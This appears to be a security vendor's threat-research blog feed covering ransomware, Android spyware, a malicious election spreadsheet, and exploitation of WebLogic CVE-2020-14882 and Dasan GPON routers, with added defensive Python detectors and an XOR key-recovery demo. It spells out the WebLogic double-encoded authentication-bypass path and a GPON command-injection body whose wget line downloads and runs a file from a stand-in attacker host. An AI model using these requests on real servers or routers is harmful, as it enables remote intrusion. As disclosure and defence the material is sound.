Posts

Ransomware spares no one except if you are from Russia, Kazakhstan or Ukraine

The SonicWall Capture Labs Research team has recently observed another ransomware being circulated in the wild. It was first spotted earlier this year but had not gained much traction at the time. Interestingly, this not-so-popular ransomware promises to decrypt your files if you are from Russia, Kazakhstan or Ukraine, and it does not impose a time limit on when victims can pay to decrypt their files.

Infection Cycle:

Erica ransomware comes as an executable that uses the following icons:

Upon execution, it connects to a remote server at 178.170.219.108.

It spawns a legitimate Windows binary to carry out its malicious functionality. During our analysis it used cvtres.exe, a Microsoft Windows file that is part of the C++ toolchain (see more details here).

The cvtres.exe process then encrypts the victim's files and appends random characters to each file's original name.

The ransomware uses the Microsoft Enhanced RSA and AES Cryptographic Provider to generate keys and encrypt data with the RSA algorithm.

It then zips up the entire %users% directory into an archive with a random name and sends the archive to a remote server, so victim data is exfiltrated as well as encrypted.

A ransom note is created in every directory in which files have been encrypted. The note promises help with decryption if the victim is from Russia, Kazakhstan or Ukraine, and it imposes no time limit on when the victim decides to pay.

The note includes a contact email address, base64 encoded, which decodes to:

erica_affiliate @ protonmail.com

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Erica.RSM (Trojan)
  • GAV: Erica.RSM_1 (Trojan)
  • GAV: Erica.RSM_2 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

CVE-2020-14882 Oracle WebLogic Remote Code Execution Vulnerability Exploited in the Wild

The SonicWall Capture Labs Threat Research team has observed the recent remote code execution vulnerability reported in Oracle WebLogic Server being exploited in the wild. The vulnerability is due to improper sanitization of user-supplied data received over HTTP.

Oracle WebLogic is one of the most widely used Java application servers. It helps build and deploy distributed web applications for large enterprises.

Vulnerability | CVE-2020-14882

A remote code execution vulnerability exists in Oracle WebLogic Server. The vulnerability is due to improper validation of user-supplied data in the com.bea.console.utils.MBeanUtilsInitSingleFileServlet and com.bea.console.handles.HandleFactory classes.

The vulnerable class com.bea.console.handles.HandleFactory can be triggered using an HTTP request with the following structure:

http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=<class_name>

MBeanUtilsInitSingleFileServlet neither filters out the directory traversal sequence ".." properly nor checks whether the user is authenticated. As a consequence, an attacker can request "/console/css/%252E%252E%252Fconsole.portal", where "%252E%252E%252F" is the double URL-encoded form of "../", to bypass authentication, and supply a request parameter whose name contains the word "handle" and whose value is the name of a class that com.bea.console.handles.HandleFactory will instantiate and that can be abused for malicious purposes.

This allows an unauthenticated attacker to achieve remote code execution on a vulnerable Oracle WebLogic Server with a single crafted HTTP GET request. Successful exploitation results in arbitrary code execution in the security context of the user running WebLogic Server.
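The double-encoding detail is the whole bug, so here is an added example written for this page (not SonicWall's signature logic and not WebLogic's own code) in Python: it models the flawed single-decode check, a canonicalising replacement, and a detector for the request pattern. The exploit path and query parameter names are taken from the text above; the handle value and all function names are constructed for illustration.

```python
"""Added example (not SonicWall's signature and not WebLogic's code): why the
double URL-encoded traversal in CVE-2020-14882 slips past a check that decodes
only once, and how a canonicalising check catches it."""
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Request shape taken from the advisory text; the handle value is a constructed placeholder.
EXPLOIT_PATH = "/console/css/%252E%252E%252Fconsole.portal"
EXPLOIT_URL = ("http://x.x.x.x:7001" + EXPLOIT_PATH
               + "?_nfpb=true&_pageLabel=HomePage1&handle=com.example.AttackerChosenClass")


def naive_is_safe(raw_path: str) -> bool:
    """Model of the flawed filter: one decode pass, then look for '..'.

    '%252E%252E%252F' decodes to '%2E%2E%2F', which contains no literal '..',
    so the request is waved through as a static /console/css/ resource.
    """
    return ".." not in unquote(raw_path)


def fully_decode(raw_path: str, max_rounds: int = 5) -> str:
    """Decode until the string stops changing (bounded, so nested encoding cannot loop forever)."""
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def canonical_path(raw_path: str) -> str:
    """Fully decode, then resolve '.' and '..' segments."""
    return posixpath.normpath(fully_decode(raw_path))


def requires_auth(raw_path: str) -> bool:
    """Hardened rule: only a canonical path under /console/css/ is exempt from authentication."""
    return not canonical_path(raw_path).startswith("/console/css/")


def is_exploit_attempt(url: str) -> bool:
    """Detection: a traversal that lands on console.portal combined with a 'handle' parameter."""
    parts = urlsplit(url)
    decoded = fully_decode(parts.path)
    lands_on_portal = posixpath.normpath(decoded).startswith("/console/console.portal")
    traversal = ".." in decoded
    has_handle = any("handle" in name.lower()
                     for name in parse_qs(parts.query, keep_blank_values=True))
    return lands_on_portal and traversal and has_handle


if __name__ == "__main__":
    print("naive check passes exploit:", naive_is_safe(EXPLOIT_PATH))
    print("canonical path:", canonical_path(EXPLOIT_PATH))
    print("hardened check requires auth:", requires_auth(EXPLOIT_PATH))
    print("flagged as exploit:", is_exploit_attempt(EXPLOIT_URL))
```

The point for a practitioner: authorization decisions must be made on the canonical path, after decoding has reached a fixed point. The same rule applies to any URL filter placed in front of WebLogic; a WAF that decodes once shares the bug.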

Exploit Requests

The following exploit requests are currently being seen in the wild (7001 is the default WebLogic listen port):

http://x.x.x.x:7001

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 14003 Oracle WebLogic Server Remote Command Execution 3
IPS: 15218 Oracle WebLogic Server Remote Command Execution 2

Exerwa ransomware leaked from CTF hacker event

The SonicWall Capture Labs threat research team has observed reports of Hungarian PC users infected by Exerwa ransomware. Exerwa is reported to be CTF malware that emerged from a Capture-the-Flag event in which participants were tasked with building functional ransomware in the shortest possible time. Unfortunately, some code from this event has ended up in the wild. The code is very basic, and the initial infection vector is a Word document using macros.

Infection Cycle:

Upon opening the Word document, the following page is shown:

A .bat script can be seen on the second page:

Once the macro has run, the following files are dropped on to the system:

  • %USERPROFILE%\Exerwa\decode.bat
  • %USERPROFILE%\Exerwa\exec.enc
  • %USERPROFILE%\Exerwa\script.enc
  • %USERPROFILE%\Exerwa\exec.exe
  • %USERPROFILE%\Exerwa\script.ps1

script.enc contains the following encoded data:

exec.enc contains the following encoded data:

decode.bat is then run. It contains the following commands:

exec.enc is decoded using the built-in Windows certutil utility (a common living-off-the-land technique) and exec.exe is created. It is a non-malicious, generic XOR encryption tool by Luigi Auriemma:

script.enc is decoded with certutil in the same way and script.ps1 is created. It contains the following PowerShell script:

This script loops over the files in a given directory and encrypts each one with the XOR tool; as shown in the script, ".exerwa" is appended to the names of encrypted files. Note that XOR with a fixed key is its own inverse, so the same tool and key recover the original files.
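Because the script delegates encryption to a generic XOR tool, recovery does not depend on the attacker's cooperation. The following is an added example written for this page (it is neither the Exerwa script nor Luigi Auriemma's tool): it reproduces the encrypt-and-rename loop in Python, then recovers the key from a single encrypted PNG using the fixed 16-byte PNG header and decrypts the rest. The key, the file contents and the assumption that the key stream starts at byte 0 of each file are constructed for the demonstration.

```python
"""Added example, not code from the Exerwa sample or its CTF origin: the
repeating-key XOR scheme the script relies on is symmetric, so the key leaks
through any file whose first bytes are predictable (a known-plaintext attack)."""
import tempfile
from pathlib import Path

SUFFIX = ".exerwa"
# Constructed key for this demonstration; the real sample's key is not given on the page.
DEMO_KEY = b"ctf-demo-key"
# First 16 bytes of every PNG file: signature plus the IHDR chunk length and type.
PNG_PREFIX = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encrypt_directory(directory: Path, key: bytes) -> list:
    """Mimics the script's loop: XOR every regular file and append .exerwa to its name."""
    renamed = []
    for path in sorted(p for p in directory.iterdir() if p.is_file()):
        if path.name.endswith(SUFFIX):
            continue
        target = path.with_name(path.name + SUFFIX)
        target.write_bytes(xor_bytes(path.read_bytes(), key))
        path.unlink()
        renamed.append(target)
    return renamed


def recover_key(ciphertext: bytes, known_plaintext: bytes, key_length: int) -> bytes:
    """key[i] = c[i] ^ p[i]; assumes the key stream starts at file offset 0 (as a plain XOR tool does)."""
    if len(known_plaintext) < key_length:
        raise ValueError("need at least key_length bytes of known plaintext")
    return xor_bytes(ciphertext[:key_length], known_plaintext[:key_length])


def guess_key_length(ciphertext: bytes, known_plaintext: bytes, max_length: int = 64) -> int:
    """Smallest key length whose recovered key reproduces the whole known prefix, or 0 if none fits."""
    limit = min(max_length, len(known_plaintext) - 1)
    for length in range(1, limit + 1):
        key = recover_key(ciphertext, known_plaintext, length)
        if xor_bytes(ciphertext[:len(known_plaintext)], key) == known_plaintext:
            return length
    return 0


def decrypt_directory(directory: Path, key: bytes) -> list:
    """Undo encrypt_directory with the recovered key."""
    restored = []
    for path in sorted(p for p in directory.iterdir() if p.name.endswith(SUFFIX)):
        original = path.with_name(path.name[: -len(SUFFIX)])
        original.write_bytes(xor_bytes(path.read_bytes(), key))
        path.unlink()
        restored.append(original)
    return restored


def demo() -> dict:
    """End to end on constructed files: encrypt, recover the key from one PNG, decrypt everything."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "photo.png").write_bytes(PNG_PREFIX + b"constructed image body")
        (d / "notes.txt").write_bytes(b"constructed text document")
        encrypt_directory(d, DEMO_KEY)
        cipher = (d / ("photo.png" + SUFFIX)).read_bytes()
        length = guess_key_length(cipher, PNG_PREFIX)
        key = recover_key(cipher, PNG_PREFIX, length)
        decrypt_directory(d, key)
        return {"key": key, "notes": (d / "notes.txt").read_bytes()}


if __name__ == "__main__":
    print(demo())
```

Any file type with a fixed header (PNG, PDF, ZIP, Office documents) serves as the known plaintext; one such file in the encrypted tree is enough to recover every other file encrypted with the same key.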

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Exerwa.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

LockDown ransomware actively spreading in the wild

The SonicWall Capture Labs Threat Research team has observed reports of a new variant of the LOCKDOWN ransomware family actively spreading in the wild.

The LOCKDOWN ransomware encrypts the victim's files with a strong encryption algorithm and holds them until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\[Name].<LOCKDOWN>
    • %App.path%\[Name].<bondy>
    • %App.path%\[Name].<Connect>
    • %App.path%\[Name].<sext>

Once the computer is compromised, the ransomware runs the following commands (actual source code):

When LOCKDOWN starts, it creates and assigns a unique ID to the victim, then scans all local drives for data files to encrypt.

When encrypting files it uses the AES algorithm and encrypts only files matching the following extensions:

The ransomware encrypts all matching files and appends the [LOCKDOWN] extension to each encrypted file's name.

After encrypting all personal documents, the ransomware shows the following picture containing a message that the computer has been encrypted and that the victim must contact its developer for unlock instructions.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Blackheart.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Attackers actively targeting vulnerable Dasan GPON home routers

The SonicWall Capture Labs threat research team has observed attacks exploiting old vulnerabilities in Dasan GPON home routers. DASAN Zhone Solutions is a provider of network access solutions for service-provider and enterprise networks, offering a wide array of networking technologies including broadband access, Ethernet switching, passive optical LAN and software-defined networks.

Attackers are targeting the following two vulnerabilities in GPON home routers:

Authentication Bypass Vulnerability
Authentication can be bypassed simply by appending "?images" to any URL on the device that requires authentication, for example /menu.html?images/ or /GponForm/diag_Form?images/. The attacker can then manage the device. (CVE-2018-10561)

Command Injection Vulnerability
A command injection vulnerability exists in Dasan GPON home routers via the dest_host parameter of a diag_action=ping request to the /GponForm/diag_Form URI. The router saves the ping results in the tmp directory and displays them when a user visits diag.html, which can be used to inject and execute commands. (CVE-2018-10562)

The following exploit was spotted in the wild:

The attacker chains the two vulnerabilities: authentication is bypassed by appending "?images" to the POST request URI, and a malicious executable is fetched by injecting a wget command through dest_host. The download is saved in the tmp directory and is executed when the diag.html page is visited.
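As an added example for this page (not Dasan firmware code and not the IPS signature), the Python below parses a diag_Form request of the kind described, flags the ?images bypass and the dest_host injection, and shows the allow-list validation of dest_host that would have prevented CVE-2018-10562. The request lines and bodies are constructed from the description above; the download URL is a placeholder.

```python
"""Added example (not Dasan firmware code and not SonicWall's IPS signature):
parse a diag_Form request the way a detector would, flag the two CVEs the page
describes, and show the allow-list check on dest_host that the router lacked."""
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit

# RFC 1123 style hostname: labels of letters, digits and hyphens, no leading or
# trailing hyphen, so a value cannot start with '-' and turn into a ping option.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
# Characters that terminate or chain commands in a POSIX shell.
SHELL_META_RE = re.compile(r"[;&|`$()<>\n\r]")


def is_valid_ping_target(dest_host: str) -> bool:
    """Allow-list: a literal IP address or a syntactically valid hostname, nothing else."""
    try:
        ipaddress.ip_address(dest_host)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(dest_host))


def parse_form_body(body: str) -> dict:
    """Split only on '&' so a ';' inside a value stays part of the injected payload."""
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), unquote_plus(value))
    return params


def analyse_request(request_line: str, body: str) -> dict:
    """Classify one HTTP request against CVE-2018-10561 (auth bypass) and CVE-2018-10562 (injection)."""
    method, target, _ = request_line.split(" ", 2)
    parts = urlsplit(target)
    params = parse_form_body(body) if method == "POST" else {}
    dest_host = params.get("dest_host", "")
    auth_bypass = parts.query.startswith("images")
    injection = (
        parts.path == "/GponForm/diag_Form"
        and params.get("diag_action") == "ping"
        and not is_valid_ping_target(dest_host)
    )
    payload = ""
    if injection:
        match = SHELL_META_RE.search(dest_host)
        payload = dest_host[match.start():] if match else dest_host
    return {"auth_bypass": auth_bypass, "command_injection": injection, "payload": payload}


# Constructed from the page's description; attacker.example is a placeholder host.
EXPLOIT_REQUEST = (
    "POST /GponForm/diag_Form?images/ HTTP/1.1",
    "diag_action=ping&dest_host=127.0.0.1%3Bwget+http://attacker.example/bot+-O+/tmp/bot%3Bsh+/tmp/bot",
)
BENIGN_REQUEST = ("POST /GponForm/diag_Form HTTP/1.1", "diag_action=ping&dest_host=8.8.8.8")


if __name__ == "__main__":
    print("exploit:", analyse_request(*EXPLOIT_REQUEST))
    print("benign: ", analyse_request(*BENIGN_REQUEST))
```

The detector keys on the ?images query because the page reports it chained with the injection; on its own, a ?images suffix on any authenticated URL is already an attempt at CVE-2018-10561. The allow-list validator is the fix a vendor should have shipped: once dest_host can only be an address or hostname, there is nothing left to inject into the ping command line.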

SonicWall Capture Labs provides protection against this threat via the following signatures:

    • IPS 13340: Dasan GPON Routers Command Injection
    • GAV: Mirai.H

Threat Graph

IoCs:
59.99.45.126
117.213.46.186
117.194.165.174
112.27.124.174
42.234.109.14
2e4506802aedea2e6d53910dfb296323be6620ac08c4b799a879eace5923a7b6

A quick look at Shodan reveals thousands of vulnerable devices.

Android spyware Bahamut spreads disguised as Voice of Islam app

An Android spyware campaign was found spreading actively via the link voiceofislam.info, which has since been taken down. A cached copy of the page shows web links that led the user to download a malicious APK file:

Original page images, as posted on Twitter:

 

Infection cycle

Upon installation and execution, the app does not appear to do much from the user's point of view. In the background it contacts the attacker with the device IMEI, which is likely the registration mechanism commonly observed in Android malware:

Contacts stored on the device are siphoned back to the attacker:

Spyware capabilities

This application contains a number of spyware components that extract sensitive user-related information and send it back to the attacker's server, voiceofislam.info:

Call logs:

Contacts:

Device information:

Media files, with support for a number of extensions:

Interestingly, the spyware also handles the .crypt11 and .crypt12 file extensions, which belong to encrypted WhatsApp chat history databases.

Location:

String encryption

This malware uses Blowfish encryption to encrypt its strings with the key 9;_R%@c`gZxL9M{j”. This key has been linked to the Android spyware campaign Bahamut.

Network investigation

We observed the following VirusTotal graph for the domain voiceofislam.info:

The second malicious app identified from this graph, 6ef7ea19a000f2570c30ae3814b8482f, contains functionality similar to the one analyzed.

Digging further, we found another app related to this campaign via Koodous:

This app (MD5 9368dd657e410f8a9ba2b71c95cc0777) has code and component structure similar to the previous app, with one minor change: it uses the secret key K&M9B#)O/R\u0007=P%hA, which again coincides with the known keys associated with the Bahamut campaign.

Overall, this spyware aims at stealing sensitive user information from infected devices. Since it is part of the larger Bahamut campaign, we can expect more spyware from this campaign to spread through different means in the future.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: AndroidOSBahamut.NS (Trojan)
  • GAV: AndroidOSBahamut.SM (Trojan)

Indicators of Compromise (IOC):

Microsoft Security Bulletin Coverage for November 2020

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2020. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2020-16998 DirectX Elevation of Privilege Vulnerability
ASPY 5907:Malformed-File exe.MP.131

CVE-2020-17010 Win32k Elevation of Privilege Vulnerability
ASPY 125:Malformed-File exe.MP.165
CVE-2020-17038 Win32k Elevation of Privilege Vulnerability
ASPY 124:Malformed-File exe.MP.164

CVE-2020-17047 Windows Network File System Denial of Service Vulnerability
IPS 15220:Windows Network File System Denial of Service (CVE-2020-17047)

CVE-2020-17051 Windows Network File System Remote Code Execution Vulnerability
IPS 15223:Windows Network File System Remote Code Execution (CVE-2020-17051)

CVE-2020-17052 Scripting Engine Memory Corruption Vulnerability
IPS 15221:Scripting Engine Memory Corruption Vulnerability (CVE-2020-17052)

CVE-2020-17053 Internet Explorer Memory Corruption Vulnerability
IPS 15222:Internet Explorer Memory Corruption Vulnerability (CVE-2020-17053)

CVE-2020-17056 Windows Network File System Information Disclosure Vulnerability
IPS 15226:Windows NFS Information Disclosure (CVE-2020-17056)

CVE-2020-17057 Windows Win32k Elevation of Privilege Vulnerability
ASPY 123:Malformed-File exe.MP.161

CVE-2020-17061 Microsoft SharePoint Remote Code Execution Vulnerability
ASPY 126:Malformed-File exe.MP.166
IPS 15224: Microsoft SharePoint Remote Code Execution (CVE-2020-17061) 1
IPS 15225: Microsoft SharePoint Remote Code Execution (CVE-2020-17061) 2

CVE-2020-17087 Windows Kernel Local Elevation of Privilege Vulnerability
ASPY 117:Malformed-File exe.OT.1
GAV:CVE-2020-17087

CVE-2020-17088 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 122:Malformed-File exe.MP.160

The following vulnerabilities do not have known exploits in the wild:
CVE-2020-1325 Azure DevOps Server and Team Foundation Services Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1599 Windows Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-16970 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16979 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16981 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16982 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16983 Azure Sphere Tampering Vulnerability
There are no known exploits in the wild.
CVE-2020-16984 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16985 Azure Sphere Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16986 Azure Sphere Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-16987 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16988 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16989 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16990 Azure Sphere Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16991 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16992 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16993 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16994 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16997 Remote Desktop Protocol Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16999 Windows WalletService Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17000 Remote Desktop Protocol Client Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17001 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17004 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17005 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17006 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17007 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17011 Windows Port Class Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17012 Windows Bind Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17013 Win32k Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17014 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17015 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17016 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17017 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17018 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17019 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17020 Microsoft Word Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17021 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17024 Windows Client Side Rendering Print Provider Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17025 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17026 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17027 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17028 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17029 Windows Canonical Display Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17030 Windows MSCTF Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17031 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17032 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17033 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17034 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17035 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17036 Windows Function Discovery SSDP Provider Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17037 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17040 Windows Hyper-V Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17041 Windows Print Configuration Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17042 Windows Print Spooler Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17043 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17044 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17045 Windows KernelStream Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17046 Windows Error Reporting Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-17048 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-17049 Kerberos Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17054 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-17055 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17058 Microsoft Browser Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-17060 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17062 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17063 Microsoft Office Online Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17064 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17065 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17066 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17067 Microsoft Excel Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17068 Windows GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17069 Windows NDIS Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17070 Windows Update Medic Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17071 Windows Delivery Optimization Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17073 Windows Update Orchestrator Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17074 Windows Update Orchestrator Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17075 Windows USO Core Worker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17076 Windows Update Orchestrator Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17077 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17078 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17079 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17081 Microsoft Raw Image Extension Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17082 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17083 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17084 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17085 Microsoft Exchange Server Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-17086 Microsoft Raw Image Extension Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17090 Microsoft Defender for Endpoint Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17091 Microsoft Teams Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17100 Visual Studio Tampering Vulnerability
There are no known exploits in the wild.
CVE-2020-17101 HEIF Image Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17102 WebP Image Extensions Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17104 Visual Studio Code JSHint Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17105 AV1 Video Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17106 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17107 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17108 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17109 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17110 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17113 Windows Camera Codec Information Disclosure Vulnerability
There are no known exploits in the wild.

Ragnar Locker Ransomware

Overview:

The SonicWall Capture Labs Threat Research team recently found a new sample and new activity for Ragnar Locker ransomware.

Cyberattacks using Ragnar Locker ransomware have impacted Biological E Ltd, Capcom and Campari Group. Descriptions of the corporations hit last week and this week follow:

  • Biological E Limited is a privately held biopharmaceutical company based in Hyderabad, Telangana, India.
  • Capcom Co., Ltd. is a Japanese video game developer and publisher.
  • Campari is an Italian company active since 1860 in the branded beverage industry. It produces spirits, wines and soft drinks.

Ragnar Locker injects a module capable of collecting sensitive data from infected machines and uploads what it finds to the attackers' servers. The ransom note then warns the victim that the stolen files will be released to the public if the ransom is not paid.

Ransomware document:

Further down the document:

Ragnar Key is at the bottom of the document:

Static Layer, Information:

Overview of the sample, checking for any corruption within the PE file format:

Command-Line overview of sample:

Dynamic Information:

Shellcode Buffer:

Shellcode Entry:

Some Shellcode Functionality:

Anti-Debugging Block:

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall Gateway Anti-Virus (GAV) provides protection against this threat:

  • GAV: RagnarLocker.RSM_2 (Trojan)

Appendix:

Sample SHA256 Hash: 0766beb30c575fc68d1ca134bd53c086d2ce63b040e4d0bbd6d89d8c26ca04f6

Fake Election-related Document found spreading Malware

As the world watches for the outcome of the U.S. election and election night turns into election days, cybercriminals are riding the wave with social engineering. The SonicWall Capture Labs Research team has analyzed a malicious document fittingly named "ElectionInterference" which, when opened, downloads additional malicious software.

Infection Cycle:

The file comes as a Microsoft Excel spreadsheet, possibly distributed via spam as an email attachment, using the following filename pattern:

ElectionInterference_[0-9]{10}.xls

 

Once opened, the victim is instructed to enable editing and enable content.

When content is enabled, the auto_open macro runs in the background. It is hidden within one of the sheets, as seen in the screenshots below:

It then creates a directory, downloads a file from a remote server and saves it as fiskat.exe in the newly created folder:

  • C:/Temp/temp2/fiskat.exe

